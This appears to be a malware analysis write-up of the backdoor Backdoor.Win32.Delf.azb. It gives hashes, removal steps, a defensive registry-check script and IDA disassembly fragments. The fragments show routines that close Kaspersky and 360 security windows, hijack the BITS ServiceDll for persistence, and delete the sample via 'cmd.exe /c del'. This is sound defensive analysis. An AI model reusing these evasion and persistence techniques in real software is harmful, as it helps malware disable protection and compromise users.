Backdoor.Win32.Delf.azb
Virus name: Backdoor.Win32.Delf.azb (Kaspersky)
Size: 343661 bytes
Packer: BINARYRES
Sample MD5: ccb23ce816ba0d9ec4d07729bda18481
Sample SHA1: cbfba1fc9b4b03ab0675aba013d9108978d491b1
Language: Borland Delphi 6.0 - 7.0
Technical analysis:
When the virus runs, it first searches for the AVP.AlertDialog and 360SafeMonClass windows and enumerates all of their child windows. It tries to close the 360 Safeguard monitor and the Kaspersky proactive-defense windows, calling SendMessageA to simulate mouse input and click the "Allow" button the window shows; if that fails it simulates "Skip", and otherwise it forcibly closes the monitoring window.
Dropped file:
%system32%\adbits.dll
Replaces the legitimate BITS service DLL:
[HKLM\SYSTEM\CurrentControlSet\Services\BITS\Parameters\ServiceDll]
Original value: %system32%\qmgr.dll
Changed to: %system32%\adbits.dll
Brief description of BITS: Background Intelligent Transfer Service (BITS) is a required component of the newer Microsoft Windows Update and Automatic Updates services. BITS 2.0 speeds up file transfers, improves recovery and reduces wasted network bandwidth; it supports automatic start when a connection comes up and resumable transfers, and it uses idle network bandwidth to transfer files in the background. If this service is disabled, anything that depends on BITS, such as Windows Update or MSN Explorer, can no longer download programs and other information automatically.
For details see: http://msdn2.microsoft.com/en-us/library/aa362827.aspx
Drops a batch file to delete itself.
Debugging adbits.dll further turns up the string "小熊技术论坛远控" (Little Bear Tech Forum remote control), OS-version detection, registry traversal, a check of whether the machine is the host, log reading with records written to a LOG file, and use of the host process to make a reverse connection and receive remote commands... My skill is limited and I don't understand the server side, so there is still a lot I don't know.
Manual removal:
1. Use IS (IceSword) to force-delete:
%system32%\adbits.dll
2. Restore the modified registry value:
[HKLM\SYSTEM\CurrentControlSet\Services\BITS\Parameters\ServiceDll]
%system32%\adbits.dll
Change back to: %system32%\qmgr.dll
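As an added defender-side check (not the page's or the sample's code), this Python script parses constructed `reg query` output for every BITS Parameters key, flags any ServiceDll that does not resolve to qmgr.dll, and builds the reg.exe command that restores it. It assumes the real REG_EXPAND_SZ form %SystemRoot%\System32\qmgr.dll rather than the page's %system32% shorthand, and it checks every ControlSet because the listing carries both CurrentControlSet and ControlSet003 paths.

```python
import ntpath
import re
from typing import Dict, List

# File name the BITS ServiceDll must resolve to on a clean system
# (the page's original value %system32%\qmgr.dll).
EXPECTED_BITS_DLL = "qmgr.dll"

# Constructed sample of `reg query HKLM\SYSTEM\...\Services\BITS\Parameters` output,
# not captured from a real host. ControlSet003 and the live control set point at
# adbits.dll, as the strings in the page's listing suggest; ControlSet001 is clean.
SAMPLE_REG_QUERY = r"""
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\BITS\Parameters
    ServiceDll    REG_EXPAND_SZ    %SystemRoot%\System32\qmgr.dll

HKEY_LOCAL_MACHINE\SYSTEM\ControlSet003\Services\BITS\Parameters
    ServiceDll    REG_EXPAND_SZ    %SystemRoot%\System32\adbits.dll

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\BITS\Parameters
    ServiceDll    REG_EXPAND_SZ    %SystemRoot%\System32\adbits.dll
"""

KEY_RE = re.compile(r"^(HKEY_LOCAL_MACHINE\\SYSTEM\\\S+\\Services\\BITS\\Parameters)\s*$")
VALUE_RE = re.compile(r"^\s+ServiceDll\s+REG_\w+\s+(.+?)\s*$", re.IGNORECASE)

def parse_service_dll(reg_output: str) -> Dict[str, str]:
    """Map every BITS Parameters key in the reg output to its ServiceDll data."""
    result: Dict[str, str] = {}
    current_key = None
    for line in reg_output.splitlines():
        key_match = KEY_RE.match(line)
        if key_match:
            current_key = key_match.group(1)
            continue
        value_match = VALUE_RE.match(line)
        if value_match and current_key:
            result[current_key] = value_match.group(1)
    return result

def find_hijacked_bits(reg_output: str) -> List[str]:
    """Return the keys whose ServiceDll does not end in qmgr.dll (case-insensitive)."""
    return [key for key, dll in parse_service_dll(reg_output).items()
            if ntpath.basename(dll).lower() != EXPECTED_BITS_DLL]

def restore_command(key: str) -> str:
    """Build the reg.exe command that puts the legitimate ServiceDll back under one key."""
    short_key = key.replace("HKEY_LOCAL_MACHINE", "HKLM", 1)
    return (f'reg add "{short_key}" /v ServiceDll /t REG_EXPAND_SZ '
            f'/d "%SystemRoot%\\System32\\{EXPECTED_BITS_DLL}" /f')
```

Run `find_hijacked_bits` over real `reg query` output on a suspect host and feed each flagged key to `restore_command` after the DLL itself has been removed.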
Partial IDA listing:
0040425E mov eax, [ebp+var_204]
00404264 mov edx, offset s_Avp_button ; "AVP.Button"
00404269 call sub_4038F0

00404414 push ebp
00404415 mov ebp, esp
00404417 push 0 ; lpWindowName
00404419 push offset ClassName ; "AVP.Product_Notification"
0040441E call FindWindowA
0040441E
00404423 test eax, eax
00404425 jz short loc_404439
00404425
00404427 push 0 ; lParam
00404429 push 0F060h ; wParam
0040442E push 112h ; Msg
00404433 push eax ; hWnd
00404434 call SendMessageA
00404434
00404439
00404439 loc_404439: ; CODE XREF: fptc+11 j
00404439 push 0 ; lpWindowName
0040443B push offset s_Q360safemoncl ; "Q360SafeMonClass"
00404440 call FindWindowA
00404440
00404445 test eax, eax
00404447 jz short loc_40445B
00404447
00404449 push 0 ; lParam
0040444B push 0F060h ; wParam
00404450 push 112h ; Msg
00404455 push eax ; hWnd
00404456 call SendMessageA
00404456
0040445B
0040445B loc_40445B: ; CODE XREF: fptc+33 j
0040445B push 0 ; lpWindowName
0040445D push offset s_Avp_alertdial ; "AVP.AlertDialog"
00404462 call FindWindowA
00404462
00404467 test eax, eax
00404469 jz short loc_404478
00404469
0040446B push 0 ; lParam
0040446D push offset EnumFunc ; lpEnumFunc
00404472 push eax ; hWndParent
00404473 call EnumChildWindows
00404473
00404478
00404478 loc_404478: ; CODE XREF: fptc+55 j
00404478 pop ebp
00404479 retn 14h
00404479
00404479 fptc endp

CODE:004050A0 s_Bits db 'BITS',0 ; DATA XREF: 00404EB5 o
004050A0 ; 00404EC4 o
004050A0 ; loc_404F81 o
004050A0 ; 00404F90 o
004050A0 ; loc_404FFF o
004050A0 ; 0040500E o ...
004050A5 align 4
004050A8 s_FreeDllDone db 'Free DLL Done!',0 ; DATA XREF: 00404F20 o
004050A8 ; sub_4506E4+3E r
004050B7 align 4
004050B8 dd 0FFFFFFFFh
004050BC dword_4050BC dd 7 ; DATA XREF: sub_4506E4+36 r
004050C0 dword_4050C0 dd 2E646D63h, 657865h ; DATA XREF: 00404F48 o
004050C8 dword_4050C8 dd 0BBBBE6CCh, 0F1CEFEB7h ; DATA XREF: 00404F9E o
004050D0 s_Bits_0 db 'BITS',0 ; DATA XREF: DATA:00450FE4 o
004050D0 ; DATA:00451073 r
004050D0 ; DATA:0045108B r
004050D5 align 4
004050D8 s_Servicedll db 'ServiceDll',0 ; DATA XREF: 00404FB5 o
004050D8 ; 00404FCA o
004050E3 align 4
004050E4 s_SystemCurrent db 'SYSTEM\CurrentControlSet\Services\BITS\Parameters',0
004050E4 ; DATA XREF: 00404FBA o
00405116 align 4
00405118 s_SystemControl db 'SYSTEM\ControlSet003\Services\BITS\Parameters',0
00405118 ; DATA XREF: 00404FCF o
00405146 align 4
00405148 dd 0FFFFFFFFh, 12h
00405150 s_StartDllServi db 'Start DLL Service:',0 ; DATA XREF: 00404FE7 o
00405163 align 4
00405164 dd 0FFFFFFFFh, 0Fh
0040516C s_Cmd_exeCDel db 'cmd.exe /c del ',0 ; DATA XREF: 00405033 o
0040517C db 3 dup(0)
0040517F db ?
00405180 dd 20h dup(?)
00405180 CODE ends

0043E31D align 10h
0043E320 dd 0FFFFFFFFh, 1
0043E328 dword_43E328 dd 20h, 0FFFFFFFFh, 10h ; DATA XREF: sub_43E1A4+B3 o
0043E334 s_B db '小熊技术论坛远控',0 ; DATA XREF: sub_43E1A4+11C o
0043E345 align 4

0043ECF4 s_WindowsServer db 'Windows Server 2003',0 ; DATA XREF: sub_43EB1C+B1 o
0043ED08 db 0FFh,0FFh,0FFh,0FFh,0Dh,0
0043ED0E align 10h
0043ED10 s_WindowsVista db 'Windows Vista',0 ; DATA XREF: sub_43EB1C+BF o
0043ED1E align 10h
0043ED20 db 0FFh,0FFh,0FFh,0FFh,0Ah,0
0043ED26 align 4
0043ED28 s_Windows95 db 'Windows 95',0 ; DATA XREF: sub_43EB1C+E4 o
0043ED33 align 4
0043ED34 db 0FFh,0FFh,0FFh,0FFh,0Ah,0
0043ED3A align 4
0043ED3C s_Windows98 db 'Windows 98',0 ; DATA XREF: sub_43EB1C+F2 o
0043ED47 align 4
0043ED48 db 0FFh,0FFh,0FFh,0FFh,0Ah,0
0043ED4E align 10h
0043ED50 s_WindowsMe db 'Windows Me',0 ; DATA XREF: sub_43EB1C+100 o
0043ED5B align 4
0043ED5C dd 0FFFFFFFFh, 1
0043ED64 dword_43ED64 dd 20h ; DATA XREF: sub_43EB1C+128 o